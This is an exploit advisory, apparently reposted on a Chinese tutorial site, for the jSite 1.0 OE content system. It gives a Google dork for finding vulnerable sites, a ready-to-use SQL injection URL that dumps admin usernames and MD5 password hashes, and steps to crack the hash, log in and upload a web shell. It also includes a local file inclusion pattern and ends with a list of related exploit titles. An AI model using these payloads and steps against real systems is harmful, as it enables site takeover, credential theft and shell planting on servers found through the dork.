手机
当前位置:查字典教程网 >网络安全 >Exploit >jSite 1.0 OE (SQL/LFI) Multiple Remote Vulnerabilities
jSite 1.0 OE (SQL/LFI) Multiple Remote Vulnerabilities
摘要:--====================================================================...

--== ================================================================================ ==--

--== jSite 1.0 OE Multiple Remote SQL/LFI Vulnerbility ==--

--== ================================================================================ ==--

-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=[ SQL Injection Exploit ]=-=-=-=-=-=-=-=-=-=-=-=-

AUTHOR: S.W.A.T.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-

Download: http://www.sclek.com/jsite.zip

-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

DORK (google): "Powered by jSite 1.0 OE"

-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

DESCRIPTION:

You Can See Admin User & MD5 Password ..::.. Then You Can Crack It & Login ;)

-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

EXPLOITS:

www.site.com/?page=-1/**/union/**/select/**/1,2,3,concat_ws

(0x3a,user,pass),admin/**/from/**/jsite_users/*

-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

NOTE/TIP:

1 Week Off & I Be Back :D ;)

Admin Login Is At /admin/

U Can Upload Your Shell When U Login Successfully

From This Link: www.site.com/admin/index.php?menu=uploads

& Your Shell Will Be Appear Here: www.site.com/uploads/[file].php

-=-=-=-=-=-=--=-=-=-=-=-=-=-[ Local File Inclusion ]=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Exploit:

www.[target].com/Script/index.php?module=[LFI]

--== ================================================================================ ==--

--== jSite 1.0 OE Multiple Remote SQL/LFI Vulnerbility ==--

--== ================================================================================ ==--

【jSite 1.0 OE (SQL/LFI) Multiple Remote Vulnerabilities】相关文章:

Sports Clubs Web Panel 0.0.1 Remote Game Delete Exploit

Joomla Component n-forms 1.01 Blind SQL Injection Exploit

Adobe Acrobat 9 ActiveX Remote Denial of Service Exploit

Joomla Component com_content 1.0.0 (ItemID) SQL Injection Vuln

Maian Gallery 2.0 Insecure Cookie Handling Vulnerability

Pluck 4.5.1 (blogpost) Local File Inclusion Vulnerability (win only)

Xerox Phaser 8400 (reboot) Remote Denial of Service Exploit

Cisco WebEx Meeting Manager (atucfobj.dll) ActiveX Remote BOF Exploit

Joomla Component DT Register Remote SQL injection Vulnerability

LoveCMS 1.6.2 Final Update Settings Remote Exploit

精品推荐
分类导航